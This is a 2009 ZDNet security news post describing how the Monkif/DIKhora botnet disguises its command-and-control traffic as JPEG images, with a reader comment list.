On TechRepublic: Windows 7: Slower to boot than Vista?
BNET Business Network:
BNET
TechRepublic
ZDNet

September 30th, 2009

New botnet hides commands as JPEG images

Posted by Ryan Naraine @ 6:08 am

Categories: Anti Virus, Arbitrary Code Execution, Botnets, Browsers, Complex Attacks, Data theft, Malware, Passwords, Phishing, Spam and Phishing, Spyware and Adware, Viruses and Worms

Tags: JPEG, Trojan Horse, Bot, Spyware, Adware & Malware, Spyware, Viruses And Worms, Security, Ryan Naraine

Security researchers have stumbled on a new botnet that uses an interesting technique to mask its nefarious intentions.

The Monkif/DIKhora botnet, which is pushing out Trojan downloaders to infected machines, is encoding the instructions to appear as if the command-and-control server is returning a JPEG image file, according to SecureWorks researcher Jason Milletary.

Milletary explains:

The server sets the HTTP Content-Type header to “image/jpeg” and prefaces the bot commands with a fake 32-byte JPEG header. The bot checks if the header matches and decodes the rest of the response to retrieve its commands. The commands are encoded using a single byte XOR with 0×4. The malware that CTU has observed being installed by Monkif is a BHO (Browser Helper Object) trojan commonly referred to as ExeDot, which performs Ad Hijacking and Ad Clicking.

The Trojan associated with this botnet also attempts to disable anti-virus and personal firewall software to maintain its foothold on the system.

ALSO SEE:

Ryan NaraineRyan Naraine is a journalist and security evangelist at Kaspersky Lab. He manages Threatpost.com, a security news portal. Here is Ryan's full profile and disclosure of his industry affiliations.


Email Ryan Naraine

For daily updates on Ryan's activities, follow him on Twitter.

Subscribe to Zero Day via Email alerts or RSS.

  • Talkback
  • Most Recent of 48 Talkback(s)
Huh? The "defenses" are not to join the botnet. Did you even RTFA?
If you did, you would know there's nothing
"fearful" about it. Instead of the botnet being
administered with plain text commands, it's
being administered with plain text commands
prefi... (Read the rest)
Posted by: AzuMao Posted on: 10/07/09 You are currently: a Guest | | Terms of Use
What, that's it?  finder@... | 09/30/09
What, that's it?  Franciscus101 | 09/30/09
Still  djmik | 09/30/09
protecting you against what?  zdnet-registraion | 09/30/09
jpeg  Ceridan | 09/30/09
Huh? The "defenses" are not to join the botnet. Did you even RTFA?  AzuMao | 10/07/09
SC Magazine Content  rjacksix | 09/30/09
Great post. Botnet is NOT spreading through JPEG  NonZealot | 09/30/09
So basically it's just another ordinary bot  T1Oracle | 09/30/09
Nope, it isn't even using JPEGs to communicate  NonZealot | 09/30/09
true that but  Ceridan | 09/30/09
botnet hides commands as JPEG images  abeassocs2003@... | 09/30/09
What's with all the posts bagging the article?  iTeaBoy | 09/30/09
Title Not Even Accurate  rjacksix | 09/30/09
RE: New botnet hides commands as JPEG images  gertruded | 09/30/09
Uh?  Ceridan | 09/30/09
Message has been deleted.  Media Whore | 09/30/09
Should I feed the troll gertruded, or not?  GuidingLight | 09/30/09
truth is truth, no matter how often it is repeated  Media Whore | 09/30/09
Sounds reminiscent of FrogExer  mechBgon | 09/30/09
RE: New botnet hides commands as JPEG images  bfilipiak@... | 09/30/09
Interesting but not relevant  NonZealot | 09/30/09
Your seem a little obsessed by ...  914four | 10/01/09
Thanks....  JCitizen | 10/01/09
Which operating system does this exploit affect Ryan?  D. T. Schmitz | 09/30/09
This isn't an exploit  NonZealot | 09/30/09
Serious failage  Media Whore | 09/30/09
Your honour, prosecution is not playing fair!  914four | 10/01/09
Headline Should Also Read: "ON A WINDOWS PC"  jbelkin | 09/30/09
EPIC FAIL  NonZealot | 09/30/09
I guess he didn't get the memo...  mechBgon | 09/30/09
Here is the memo  wcallahan@... | 10/01/09
great another Job fanatic...  Ceridan | 09/30/09
Message has been deleted.  formation.companies | 10/01/09
What part of BHO is specific to Windows don't you get?  whisperycat | 10/01/09
Those MAC users cling to their guns and religion  wcallahan@... | 10/01/09
And some fail to understand......  LazLong | 10/01/09
RE: New botnet hides commands as JPEG images  D Walker | 10/01/09
Still  LazLong | 10/01/09
It seems they can, though...  mechBgon | 10/01/09
Of course they can  NonZealot | 10/01/09
You misunderstand me or rather I was not clear....  LazLong | 10/01/09
To clarify...  mechBgon | 10/01/09
Please show me a non Windows example  LazLong | 10/02/09
Stats you requested  mechBgon | 10/02/09
@mechBgon Thanx for the response.  LazLong | 10/02/09
Let's laugh at the Microsoft party faithfull's denials  whisperycat | 10/02/09
This article is NOT about application vulnerabilites  iTeaBoy | 10/02/09

What do you think?

SponsoredWhite Papers, Webcasts, and Downloads

advertisement

Recent Entries

advertisement

Archives

Favorite Links

ZDNet Blogs

White Papers, Webcasts, and Downloads

Meet Doc

  • Here to help you with your Document Management Needs
  • Doc is an enigma. Born to a Russian ballerina and a German electrical engineer, he grew up in various locations in the United States. He’s seen the insides of more brands, versions, and generations of printer and printer-related hardware than almost anyone.
  • To learn more about this mysterious figure check out his blog on ZDNet and his Workspace on TechRepublic. You’ll be glad you did.
  • Produced by
    ZDNet and